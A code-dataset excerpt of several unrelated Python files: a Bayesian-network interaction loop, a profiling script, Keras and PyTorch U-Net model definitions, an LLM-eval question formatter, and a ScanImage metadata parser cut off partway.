initial_updated_nodes,\n initial_snapshot, initial_precision_list, initial_stability_list,\n initial_precision_inferred_list, [], initial_window, graph_file)\n\n draw_n_save(graph_file, BN_for_inference, precision_list, stability_list,\n precision_inferred_list, loop_type='tactical')\n\n return loop_time_list, final_snapshot, current_asked, global_precisions\n\n\ndef one_pass(snapshot_dict, graph_file, graph_for_reference, BN_for_inference, lessons,\n prev_graph_states, prev_graph_file, debug=False):\n \"\"\"하나의 그래프에 대해 BN을 굽고 interaction을 진행한다.\n Here, we don't need APIs instead of state_names, since we would like to\n transfer knowledge regarding EVERY methods, including user-defined ones.\"\"\"\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n\n learned_evidence = transfer_knowledge.main(prev_graph_states, state_names, lessons)\n\n if debug:\n print(\"# of lessons:\", len(lessons))\n print(graph_file, \"has\", len(state_names), \"states\")\n print(\"# of transferred evidence:\", len(learned_evidence))\n if prev_graph_file is not None:\n # for debugging transfer\n with open(prev_graph_file + '->' + graph_file + '.txt', 'w+') as f:\n f.write(json.dumps(learned_evidence, indent=4))\n if lessons != {}:\n with open(prev_graph_file+\"_lessons.txt\", 'w+') as f:\n f.write(json.dumps(lessons, indent=4))\n\n loop_time_list, final_snapshot, current_asked, global_precisions =\\\n single_loop(snapshot_dict, graph_file, graph_for_reference,\n BN_for_inference, learned_evidence, loop_type=\"tactical\")\n\n lessons = transfer_knowledge.learn(lessons, final_snapshot, current_asked) # update the lessons\n prev_graph_file = graph_file\n prev_graph_states = state_names\n\n return lessons, prev_graph_states, prev_graph_file, global_precisions\n\n\ndef evaluate_global_precision(snapshot_dict):\n num_of_correct_nodes = 0\n for _, snapshot in snapshot_dict.items():\n state_names = list(map(lambda tup: tup[0], snapshot))\n APIs = list(filter(lambda node: node in skip_funcs, state_names))\n num_of_correct_nodes += calculate_precision(APIs, snapshot)\n return (num_of_correct_nodes/TOTAL_NUM_OF_METHS) * 100\n\n\ndef draw_n_save_global_precision_graph(global_precision_list):\n \"\"\"precision graph를 그리는 함수.\"\"\"\n precision_figure = plt.figure(\"Global Precision\")\n ax = precision_figure.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n ax.yaxis.set_major_locator(MaxNLocator(integer=True))\n precision_figure.clf()\n plt.xlim(1, TOTAL_NUM_OF_METHS)\n plt.ylim(0, 100)\n plt.xlabel('# of interactions')\n plt.ylabel('% of correct nodes')\n plt.title(\"Global Precision development during interaction\")\n plt.plot([x for x in range(TOTAL_NUM_OF_METHS)], global_precision_list, 'b-')\n plt.savefig(\"global_precision_graph_\"+NOW+\".png\")\n\n\n# TODO: do we need APIs instead of state_names here?\ndef main():\n graph_files = find_pickled_graphs()\n graph_files = list(filter(lambda x: '_poor' not in x, graph_files))\n lessons = {}\n prev_graph_states = None\n prev_graph_file = None\n BN_queue = []\n snapshot_dict = {}\n global_precision_list = []\n\n print(\"Baking BNs...\")\n\n # 일단 쪼갠 그래프들을 전부 BN으로 굽자\n for graph_file in graph_files:\n graph_for_reference = nx.read_gpickle(graph_file)\n graph_for_reference.name = graph_file\n BN_for_inference = make_BN.main(graph_for_reference, filename=graph_file, stash_poor=True)\n if len(BN_for_inference.states) == 0: # the graph file contained only poor nodes!\n continue\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n initial_raw_snapshot = BN_for_inference.predict_proba({}, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n snapshot_dict[graph_file] = initial_snapshot\n BN_for_inference.name = graph_file\n BN_queue.append((graph_for_reference, BN_for_inference))\n\n recycled_graphs = deal_with_poor_nodes.main()\n\n i = 0\n for recycled_graph in recycled_graphs:\n graph_file = \"poor_\" + str(i)\n graph_for_reference = recycled_graph\n graph_for_reference.name = graph_file\n BN_for_inference = make_BN.main(graph_for_reference, filename=None, stash_poor=False)\n if len(BN_for_inference.states) == 0: # the graph file contained only poor nodes!\n continue\n state_names = list(map(lambda node: node.name, BN_for_inference.states))\n initial_raw_snapshot = BN_for_inference.predict_proba({}, n_jobs=-1)\n initial_snapshot = make_names_and_params(state_names, initial_raw_snapshot)\n snapshot_dict[graph_file] = initial_snapshot\n BN_for_inference.name = graph_file\n BN_queue.append((graph_for_reference, BN_for_inference))\n i += 1\n\n print(\"Baking BNs...done\")\n\n # evaluate the initial global precision of snapshot_dict and add it to global_precision_list\n if SOLUTION:\n global_precision_list.append(evaluate_global_precision(snapshot_dict))\n\n for graph, BN in BN_queue:\n lessons, prev_graph_states, prev_graph_file, global_precisions =\\\n one_pass(snapshot_dict, graph.name, graph, BN, lessons,\n prev_graph_states, prev_graph_file, debug=True)\n if SOLUTION:\n global_precision_list += global_precisions\n\n for _ in range(TOTAL_NUM_OF_METHS-len(global_precision_list)):\n global_precision_list.append(np.nan)\n\n if SOLUTION:\n draw_n_save_global_precision_graph(global_precision_list)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jeongsoolee09/Taint-Analysis","sub_path":"Code/BayesianNetwork/loop.py","file_name":"loop.py","file_ext":"py","file_size_in_byte":41351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30301053900","text":"import blb, yep\n\nclass ProfBLB(blb.BLB):\n def __init__(self, **kwargs):\n self.compute_estimate = 'stdev'\n self.reduce_bootstraps = 'mean'\n self.average = 'mean'\n blb.BLB.__init__(self, **kwargs)\n\nif __name__ == '__main__':\n data1 = range(10000)\n data2 = range(50000)\n data3 = range(100000)\n\n tester = ProfBLB()\n tester.run(data3)\n\n yep.start('cilk.prof')\n for i in xrange(500):\n tester.run(data3)\n yep.stop()\n \n \n","repo_name":"pbirsinger/SPARK_BLB","sub_path":"analysis/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"462115922","text":"import tensorflow as tf\nimport functools\n\ndef create(\n input_shape,\n num_neurons=100,\n num_layers=2,\n activation=tf.nn.relu,\n ):\n\n options = locals().copy()\n\n Dense = functools.partial(tf.keras.layers.Dense, activation=activation)\n\n layers = []\n for _ in range(num_layers):\n layers.append(Dense(num_neurons))\n layers.append(Dense(1, activation=tf.identity))\n\n model = tf.keras.models.Sequential(layers)\n\n return model, options\n","repo_name":"aamini/evidential-deep-learning","sub_path":"neurips2020/models/toy/deterministic.py","file_name":"deterministic.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":369,"dataset":"github-code","pt":"37"} +{"seq_id":"10080487989","text":"import math\nfrom typing import Callable, List, Optional, Tuple\n\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\n\nfrom direct.data import transforms as T\n\n\nclass ConvBlock(nn.Module):\n \"\"\"U-Net convolutional block.\n\n It consists of two convolution layers each followed by instance normalization, LeakyReLU activation and dropout.\n \"\"\"\n\n def __init__(self, in_channels: int, out_channels: int, dropout_probability: float):\n \"\"\"Inits ConvBlock.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels.\n out_channels: int\n Number of output channels.\n dropout_probability: float\n Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.dropout_probability = dropout_probability\n\n self.layers = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(dropout_probability),\n nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n nn.Dropout2d(dropout_probability),\n )\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs the forward pass of :class:`ConvBlock`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n return self.layers(input_data)\n\n def __repr__(self):\n \"\"\"Representation of :class:`ConvBlock`.\"\"\"\n return (\n f\"ConvBlock(in_channels={self.in_channels}, out_channels={self.out_channels}, \"\n f\"dropout_probability={self.dropout_probability})\"\n )\n\n\nclass TransposeConvBlock(nn.Module):\n \"\"\"U-Net Transpose Convolutional Block.\n\n It consists of one convolution transpose layers followed by instance normalization and LeakyReLU activation.\n \"\"\"\n\n def __init__(self, in_channels: int, out_channels: int):\n \"\"\"Inits :class:`TransposeConvBlock`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels.\n out_channels: int\n Number of output channels.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n\n self.layers = nn.Sequential(\n nn.ConvTranspose2d(in_channels, out_channels, kernel_size=2, stride=2, bias=False),\n nn.InstanceNorm2d(out_channels),\n nn.LeakyReLU(negative_slope=0.2, inplace=True),\n )\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`TransposeConvBlock`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n return self.layers(input_data)\n\n def __repr__(self):\n \"\"\"Representation of \"class:`TransposeConvBlock`.\"\"\"\n return f\"ConvBlock(in_channels={self.in_channels}, out_channels={self.out_channels})\"\n\n\nclass UnetModel2d(nn.Module):\n \"\"\"PyTorch implementation of a U-Net model based on [1]_.\n\n References\n ----------\n\n .. [1] Ronneberger, Olaf, et al. “U-Net: Convolutional Networks for Biomedical Image Segmentation.” Medical Image Computing and Computer-Assisted Intervention – MICCAI 2015, edited by Nassir Navab et al., Springer International Publishing, 2015, pp. 234–41. Springer Link, https://doi.org/10.1007/978-3-319-24574-4_28.\n \"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n ):\n \"\"\"Inits :class:`UnetModel2d`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels to the u-net.\n out_channels: int\n Number of output channels to the u-net.\n num_filters: int\n Number of output channels of the first convolutional layer.\n num_pool_layers: int\n Number of down-sampling and up-sampling layers (depth).\n dropout_probability: float\n Dropout probability.\n \"\"\"\n super().__init__()\n\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.num_filters = num_filters\n self.num_pool_layers = num_pool_layers\n self.dropout_probability = dropout_probability\n\n self.down_sample_layers = nn.ModuleList([ConvBlock(in_channels, num_filters, dropout_probability)])\n ch = num_filters\n for _ in range(num_pool_layers - 1):\n self.down_sample_layers += [ConvBlock(ch, ch * 2, dropout_probability)]\n ch *= 2\n self.conv = ConvBlock(ch, ch * 2, dropout_probability)\n\n self.up_conv = nn.ModuleList()\n self.up_transpose_conv = nn.ModuleList()\n for _ in range(num_pool_layers - 1):\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [ConvBlock(ch * 2, ch, dropout_probability)]\n ch //= 2\n\n self.up_transpose_conv += [TransposeConvBlock(ch * 2, ch)]\n self.up_conv += [\n nn.Sequential(\n ConvBlock(ch * 2, ch, dropout_probability),\n nn.Conv2d(ch, self.out_channels, kernel_size=1, stride=1),\n )\n ]\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`UnetModel2d`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n stack = []\n output = input_data\n\n # Apply down-sampling layers\n for _, layer in enumerate(self.down_sample_layers):\n output = layer(output)\n stack.append(output)\n output = F.avg_pool2d(output, kernel_size=2, stride=2, padding=0)\n\n output = self.conv(output)\n\n # Apply up-sampling layers\n for transpose_conv, conv in zip(self.up_transpose_conv, self.up_conv):\n downsample_layer = stack.pop()\n output = transpose_conv(output)\n\n # Reflect pad on the right/bottom if needed to handle odd input dimensions.\n padding = [0, 0, 0, 0]\n if output.shape[-1] != downsample_layer.shape[-1]:\n padding[1] = 1 # Padding right\n if output.shape[-2] != downsample_layer.shape[-2]:\n padding[3] = 1 # Padding bottom\n if sum(padding) != 0:\n output = F.pad(output, padding, \"reflect\")\n\n output = torch.cat([output, downsample_layer], dim=1)\n output = conv(output)\n\n return output\n\n\nclass NormUnetModel2d(nn.Module):\n \"\"\"Implementation of a Normalized U-Net model.\"\"\"\n\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n norm_groups: int = 2,\n ):\n \"\"\"Inits :class:`NormUnetModel2d`.\n\n Parameters\n ----------\n in_channels: int\n Number of input channels to the u-net.\n out_channels: int\n Number of output channels to the u-net.\n num_filters: int\n Number of output channels of the first convolutional layer.\n num_pool_layers: int\n Number of down-sampling and up-sampling layers (depth).\n dropout_probability: float\n Dropout probability.\n norm_groups: int,\n Number of normalization groups.\n \"\"\"\n super().__init__()\n\n self.unet2d = UnetModel2d(\n in_channels=in_channels,\n out_channels=out_channels,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n\n self.norm_groups = norm_groups\n\n @staticmethod\n def norm(input_data: torch.Tensor, groups: int) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n \"\"\"Performs group normalization.\"\"\"\n # group norm\n b, c, h, w = input_data.shape\n input_data = input_data.reshape(b, groups, -1)\n\n mean = input_data.mean(-1, keepdim=True)\n std = input_data.std(-1, keepdim=True)\n\n output = (input_data - mean) / std\n output = output.reshape(b, c, h, w)\n\n return output, mean, std\n\n @staticmethod\n def unnorm(input_data: torch.Tensor, mean: torch.Tensor, std: torch.Tensor, groups: int) -> torch.Tensor:\n b, c, h, w = input_data.shape\n input_data = input_data.reshape(b, groups, -1)\n return (input_data * std + mean).reshape(b, c, h, w)\n\n @staticmethod\n def pad(input_data: torch.Tensor) -> Tuple[torch.Tensor, Tuple[List[int], List[int], int, int]]:\n _, _, h, w = input_data.shape\n w_mult = ((w - 1) | 15) + 1\n h_mult = ((h - 1) | 15) + 1\n w_pad = [math.floor((w_mult - w) / 2), math.ceil((w_mult - w) / 2)]\n h_pad = [math.floor((h_mult - h) / 2), math.ceil((h_mult - h) / 2)]\n\n output = F.pad(input_data, w_pad + h_pad)\n return output, (h_pad, w_pad, h_mult, w_mult)\n\n @staticmethod\n def unpad(\n input_data: torch.Tensor,\n h_pad: List[int],\n w_pad: List[int],\n h_mult: int,\n w_mult: int,\n ) -> torch.Tensor:\n return input_data[..., h_pad[0] : h_mult - h_pad[1], w_pad[0] : w_mult - w_pad[1]]\n\n def forward(self, input_data: torch.Tensor) -> torch.Tensor:\n \"\"\"Performs forward pass of :class:`NormUnetModel2d`.\n\n Parameters\n ----------\n input_data: torch.Tensor\n\n Returns\n -------\n torch.Tensor\n \"\"\"\n\n output, mean, std = self.norm(input_data, self.norm_groups)\n output, pad_sizes = self.pad(output)\n output = self.unet2d(output)\n\n output = self.unpad(output, *pad_sizes)\n output = self.unnorm(output, mean, std, self.norm_groups)\n\n return output\n\n\nclass Unet2d(nn.Module):\n \"\"\"PyTorch implementation of a U-Net model for MRI Reconstruction.\"\"\"\n\n def __init__(\n self,\n forward_operator: Callable,\n backward_operator: Callable,\n num_filters: int,\n num_pool_layers: int,\n dropout_probability: float,\n skip_connection: bool = False,\n normalized: bool = False,\n image_initialization: str = \"zero_filled\",\n **kwargs,\n ):\n \"\"\"Inits :class:`Unet2d`.\n\n Parameters\n ----------\n forward_operator: Callable\n Forward Operator.\n backward_operator: Callable\n Backward Operator.\n num_filters: int\n Number of first layer filters.\n num_pool_layers: int\n Number of pooling layers.\n dropout_probability: float\n Dropout probability.\n skip_connection: bool\n If True, skip connection is used for the output. Default: False.\n normalized: bool\n If True, Normalized Unet is used. Default: False.\n image_initialization: str\n Type of image initialization. Default: \"zero-filled\".\n kwargs: dict\n \"\"\"\n super().__init__()\n extra_keys = kwargs.keys()\n for extra_key in extra_keys:\n if extra_key not in [\n \"sensitivity_map_model\",\n \"model_name\",\n ]:\n raise ValueError(f\"{type(self).__name__} got key `{extra_key}` which is not supported.\")\n self.unet: nn.Module\n if normalized:\n self.unet = NormUnetModel2d(\n in_channels=2,\n out_channels=2,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n else:\n self.unet = UnetModel2d(\n in_channels=2,\n out_channels=2,\n num_filters=num_filters,\n num_pool_layers=num_pool_layers,\n dropout_probability=dropout_probability,\n )\n self.forward_operator = forward_operator\n self.backward_operator = backward_operator\n self.skip_connection = skip_connection\n self.image_initialization = image_initialization\n self._coil_dim = 1\n self._spatial_dims = (2, 3)\n\n def compute_sense_init(self, kspace: torch.Tensor, sensitivity_map: torch.Tensor) -> torch.Tensor:\n r\"\"\"Computes sense initialization :math:`x_{\\text{SENSE}}`:\n\n .. math::\n x_{\\text{SENSE}} = \\sum_{k=1}^{n_c} {S^{k}}^* \\times y^k\n\n where :math:`y^k` denotes the data from coil :math:`k`.\n\n Parameters\n ----------\n kspace: torch.Tensor\n k-space of shape (N, coil, height, width, complex=2).\n sensitivity_map: torch.Tensor\n Sensitivity map of shape (N, coil, height, width, complex=2).\n\n Returns\n -------\n input_image: torch.Tensor\n Sense initialization :math:`x_{\\text{SENSE}}`.\n \"\"\"\n input_image = T.complex_multiplication(\n T.conjugate(sensitivity_map),\n self.backward_operator(kspace, dim=self._spatial_dims),\n )\n input_image = input_image.sum(self._coil_dim)\n return input_image\n\n def forward(\n self,\n masked_kspace: torch.Tensor,\n sensitivity_map: Optional[torch.Tensor] = None,\n ) -> torch.Tensor:\n \"\"\"Computes forward pass of Unet2d.\n\n Parameters\n ----------\n masked_kspace: torch.Tensor\n Masked k-space of shape (N, coil, height, width, complex=2).\n sensitivity_map: torch.Tensor\n Sensitivity map of shape (N, coil, height, width, complex=2). Default: None.\n\n Returns\n -------\n output: torch.Tensor\n Output image of shape (N, height, width, complex=2).\n \"\"\"\n if self.image_initialization == \"sense\":\n if sensitivity_map is None:\n raise ValueError(\"Expected sensitivity_map not to be None with 'sense' image_initialization.\")\n input_image = self.compute_sense_init(\n kspace=masked_kspace,\n sensitivity_map=sensitivity_map,\n )\n elif self.image_initialization == \"zero_filled\":\n input_image = self.backward_operator(masked_kspace, dim=self._spatial_dims).sum(self._coil_dim)\n else:\n raise ValueError(\n f\"Unknown image_initialization. Expected `sense` or `zero_filled`. \"\n f\"Got {self.image_initialization}.\"\n )\n\n output = self.unet(input_image.permute(0, 3, 1, 2)).permute(0, 2, 3, 1)\n if self.skip_connection:\n output += input_image\n return output\n","repo_name":"NKI-AI/direct","sub_path":"direct/nn/unet/unet_2d.py","file_name":"unet_2d.py","file_ext":"py","file_size_in_byte":15129,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"37"} +{"seq_id":"38170320881","text":"\"\"\"\nA core part of the evalugator model is that the Batches and Piles that it works\nwith do NOT represent the \"final\" form of a dataset passed to a model. Why?\nBecause e.g. the abstract form of a multiple-choice question exists with some\nright and wrong answers exists independent of things like which order the\noptions are presented in, what the style is (\"A\" vs \"1.\" vs \"(A)\" vs ...), and\nany prompt prefixes/suffixes/templates that surround the questions. The\nformatters in this file are the core interface between the \"abstract\" piles and\nconcrete-strings-or-message-lists-you-could-pass-into-an-LLM.\n\"\"\"\n\n\nfrom typing import List, Tuple, Union, cast, Sequence\n\nimport numpy as np\n\nfrom evalugator.structs import (\n ExportTemplates,\n FormattedAnswerInfo,\n FormattedMCQAnswerInfo,\n FormattedQAAnswerInfo,\n MCQuestionExportTemplate,\n QA,\n MCQuestion,\n Message,\n ModelInput,\n QAExportTemplate,\n Question,\n ExportExtension,\n QuestionExportTemplate,\n Trial,\n)\nfrom evalugator.utils import render_jinja_string\nfrom evalugator.formatters_utils import (\n make_template_extension_renderer,\n PREFIX_EXTENSION_FN_TABLE,\n SUFFIX_EXTENSION_FN_TABLE,\n mc_option_format,\n)\n\n\"\"\"\nThis file is about taking Trial and subclasses of it (as defined in structs.py)\nand formatting them into strings (including answer-choice order randomization\netc.)\n\"\"\"\n\n\nclass TrialFormatter:\n def __init__(self, seed=0):\n self.seed = seed\n\n def format(self, trial: Trial):\n raise NotImplementedError\n\n def shuffle(self, l):\n np.random.seed(self.seed)\n permuted_indices = np.random.permutation(len(l))\n if len(l) > 0 and isinstance(l[0], list):\n # we have a list of lists, apply same shuffle to all\n assert all(\n [len(sublist) == len(l[0]) for sublist in l]\n ), \"list of lists in TrialFormatter.shuffle must have all same length\"\n permuted_indices = np.random.permutation(len(l[0]))\n l = [np.array(sublist)[permuted_indices].tolist() for sublist in l]\n else:\n l = np.array(l)[permuted_indices].tolist()\n self.seed += 1\n return l\n\n def apply_template_extension(\n self,\n template_extension: ExportExtension,\n rendered: Union[str, List[Message]],\n **template_vars,\n ) -> Union[str, List[Message]]:\n ext: Union[str, List[Message]] = self.render_from_template(\n template_extension.template, **template_vars\n )\n if template_extension.location == \"prefix\":\n rendered = make_template_extension_renderer(PREFIX_EXTENSION_FN_TABLE)(\n rendered, ext\n )\n elif template_extension.location == \"suffix\":\n rendered = make_template_extension_renderer(SUFFIX_EXTENSION_FN_TABLE)(\n rendered, ext\n )\n else:\n raise ValueError(\n f\"template_extension.location must be 'prefix' or 'suffix', not {template_extension.location}\"\n )\n return rendered\n\n def render_from_template(\n self,\n template: Union[str, List[Message]],\n template_extensions=[],\n **template_vars,\n ) -> Union[str, List[Message]]:\n if isinstance(template, str):\n rendered = render_jinja_string(template, **template_vars)\n else:\n assert isinstance(template, list)\n rendered = [\n Message(\n role=message.role,\n content=render_jinja_string(\n message.content,\n **template_vars,\n ),\n )\n for message in template\n ]\n for template_extension in template_extensions:\n rendered = self.apply_template_extension(\n template_extension, rendered, **template_vars\n )\n return rendered\n\n\nclass QuestionFormatter(TrialFormatter):\n def __init__(\n self,\n seed=0,\n template: Union[str, List[Message]] = \"{{_question_body}}\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.template = template\n self.template_extensions = template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: QuestionExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return QuestionFormatter(\n seed=template.seed,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(self, question: Question) -> Tuple[Union[str, List[Message]], None]:\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = question.body\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n None,\n )\n\n\nclass QAFormatter(QuestionFormatter):\n def __init__(\n self,\n seed=0,\n template: Union[str, List[Message]] = \"{{_question_body}}\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.template = template\n self.template_extensions = template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: QAExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return QAFormatter(\n seed=template.seed,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(self, qa: QA) -> Tuple[Union[str, List[Message]], FormattedQAAnswerInfo]:\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = qa.body\n template_vars[\"_ideal_answers\"] = qa.ideal_answers\n answer_info = FormattedQAAnswerInfo(ideal_answers=qa.ideal_answers)\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n answer_info,\n )\n\n\nclass MCQuestionFormatter(QuestionFormatter):\n def __init__(\n self,\n seed: int = 0,\n style: str = \"(A)\",\n styles_in_ideal_answers: List[str] = [\"(A)\", \"A\", \"A)\"],\n template: Union[\n str, List[Message]\n ] = \"{{_question_body}}\\n{{_answer_lines}}\\n\\nAnswer: (\",\n template_extensions: List[ExportExtension] = [],\n **extra_template_vars,\n ):\n super().__init__(seed)\n self.style = style\n if \"__text__\" in styles_in_ideal_answers:\n self.allow_text_answer = True\n else:\n self.allow_text_answer = False\n self.styles_in_ideal_answers = [\n style for style in styles_in_ideal_answers if style != \"__text__\"\n ]\n self.template = template\n self.template_extensions = template_extensions\n self.extra_template_vars = extra_template_vars\n\n @staticmethod\n def from_templates(\n template: MCQuestionExportTemplate,\n extensions: List[ExportExtension],\n templates: ExportTemplates,\n ):\n return MCQuestionFormatter(\n seed=template.seed,\n style=template.answer_style,\n styles_in_ideal_answers=template.answer_styles_in_ideal,\n template=template.template_messages,\n template_extensions=extensions,\n **templates.define_your_special_variables,\n )\n\n def format(\n self, question: MCQuestion\n ) -> Tuple[Union[str, List[Message]], FormattedMCQAnswerInfo]:\n correct_by_index = [1 for _ in question.choices_right] + [\n 0 for _ in question.choices_wrong\n ]\n choice_texts, correct_by_index = self.shuffle(\n [question.choices_right + question.choices_wrong, correct_by_index]\n )\n choice_lines = [\n f\"{mc_option_format(i, style=self.style)} {choice_text}\"\n for i, choice_text in enumerate(choice_texts)\n ]\n ideal_answers = [\n mc_option_format(i, style=style)\n for style in self.styles_in_ideal_answers\n for i, correct in enumerate(correct_by_index)\n if correct == 1\n ]\n if self.allow_text_answer:\n ideal_answers.append(question.choices_right[0])\n wrong_answers = [\n mc_option_format(i, style=style)\n for style in self.styles_in_ideal_answers\n for i, correct in enumerate(correct_by_index)\n if correct == 0\n ]\n answer_lines = \"\\n\".join(choice_lines)\n template_vars = self.extra_template_vars\n template_vars[\"_question_body\"] = question.body\n template_vars[\"_answer_lines\"] = answer_lines\n template_vars[\"_ideal_answers\"] = ideal_answers\n # question_str = question.body + \"\\n\" + \"\\n\".join(choice_lines) + self.suffix\n formatted_answer_info = FormattedMCQAnswerInfo(\n ideal_answers=ideal_answers,\n wrong_answers=wrong_answers,\n styles_accepted=self.styles_in_ideal_answers,\n text_accepted=self.allow_text_answer,\n style_default=self.style,\n position_to_answer_text={\n i: choice_text for i, choice_text in enumerate(choice_texts)\n },\n position_to_correct={\n i: correct for i, correct in enumerate(correct_by_index)\n },\n position_to_answer_option={\n i: mc_option_format(i, style=self.style)\n for i, _ in enumerate(choice_texts)\n },\n )\n return (\n self.render_from_template(\n self.template, self.template_extensions, **template_vars\n ),\n formatted_answer_info,\n )\n\n\ndef get_rendered_and_answer_infos_from_batch(\n batch, formatter: TrialFormatter, trial_type\n) -> Tuple[Sequence[ModelInput], Sequence[FormattedAnswerInfo]]:\n rendered = []\n answer_infos = []\n for trial in batch.data.trials:\n trial = cast(trial_type, trial)\n render, answer_info = formatter.format(trial)\n rendered.append(render)\n answer_infos.append(answer_info)\n return rendered, answer_infos\n","repo_name":"LRudL/evalugator","sub_path":"evalugator/formatters.py","file_name":"formatters.py","file_ext":"py","file_size_in_byte":10629,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"32721171574","text":"import json\nimport numpy as np\nfrom skimage import io\n\n# Utility functions for working with ScanImage tiff files\n\n## EXTRACT METADATA ##\ndef getSIbasicMetadata(metadat):\n\n #initilize dict\n metadict = {}\n\n if type(metadat) == dict: #the output of read_scanimage_metadata() from the tifffile module is a dict\n nCh = metadat['SI.hChannels.channelSave']\n fpsscan = metadat['SI.hRoiManager.scanFrameRate']\n discardFBFrames = metadat['SI.hFastZ.discardFlybackFrames']\n nDiscardFBFrames = metadat['SI.hFastZ.numDiscardFlybackFrames']\n fpv = metadat['SI.hFastZ.numFramesPerVolume']\n nVols = metadat['SI.hFastZ.numVolumes']\n stackZStepSize = metadat['SI.hStackManager.stackZStepSize']\n scanVolumeRate = metadat['SI.hRoiManager.scanVolumeRate']\n [p00, p10, p01, p11] = metadat['SI.hRoiManager.imagingFovUm']\n\n else:\n for i, line in enumerate(metadat.split('\\n')):\n\n if not 'SI.' in line: continue\n # extract version\n if 'VERSION_' in line: print(line)\n\n # get channel info\n if 'channelSave' in line:\n #print(line)\n if not '[' in line:\n nCh = 1\n else:\n strchanlist = line.split('=')[-1].strip()\n try: chanlist = [int(i) for i in strchanlist.strip('][').split(' ')] \n except ValueError: chanlist = [int(i) for i in strchanlist.strip('][').split(';')] \n nCh = len(chanlist)\n\n if 'scanFrameRate' in line:\n fpsscan = float(line.split('=')[-1].strip())\n\n\n #if 'hFastZ' in line:\n if 'discardFlybackFrames' in line:\n discardFBFrames = line.split('=')[-1].strip()\n\n if 'numDiscardFlybackFrames' in line:\n nDiscardFBFrames = int(line.split('=')[-1].strip())\n\n if 'numFramesPerVolume' in line:\n fpv = int(line.split('=')[-1].strip())\n\n\n if 'numVolumes' in line:\n nVols = int(line.split('=')[-1].strip())\n\n if 'hStackManager.stackZStepSize' in line:\n stackZStepSize = float(line.split('=')[-1].strip())\n\n if 'hRoiManager.scanVolumeRate' in line:\n scanVolumeRate = float(line.split('=')[-1].strip())\n\n if 'SI.hRoiManager.imagingFovUm' in line:\n imagingFovUm = line.split('=')[-1].strip()\n p00 = np.fromstring(imagingFovUm[1:-1].split(';')[0], dtype=float, count=2, sep=' ')\n p10 = np.fromstring(imagingFovUm[1:-1].split(';')[1], dtype=float, count=2, sep=' ')\n p01 = np.fromstring(imagingFovUm[1:-1].split(';')[2], dtype=float, count=2, sep=' ')\n p11 = np.fromstring(imagingFovUm[1:-1].split(';')[3], dtype=float, count=2, sep=' ')\n\n metadict[\"nCh\"] = nCh\n metadict[\"fpsscan\"] = fpsscan\n metadict[\"discardFBFrames\"] = discardFBFrames\n metadict[\"nDiscardFBFrames\"] = nDiscardFBFrames\n metadict[\"fpv\"] = fpv\n metadict[\"nVols\"] = nVols\n metadict[\"stackZStepSize\"] = stackZStepSize\n metadict[\"scanVolumeRate\"] = scanVolumeRate\n metadict[\"fovCoords\"] = {'p00':list(p00),'p10':list(p01),\n 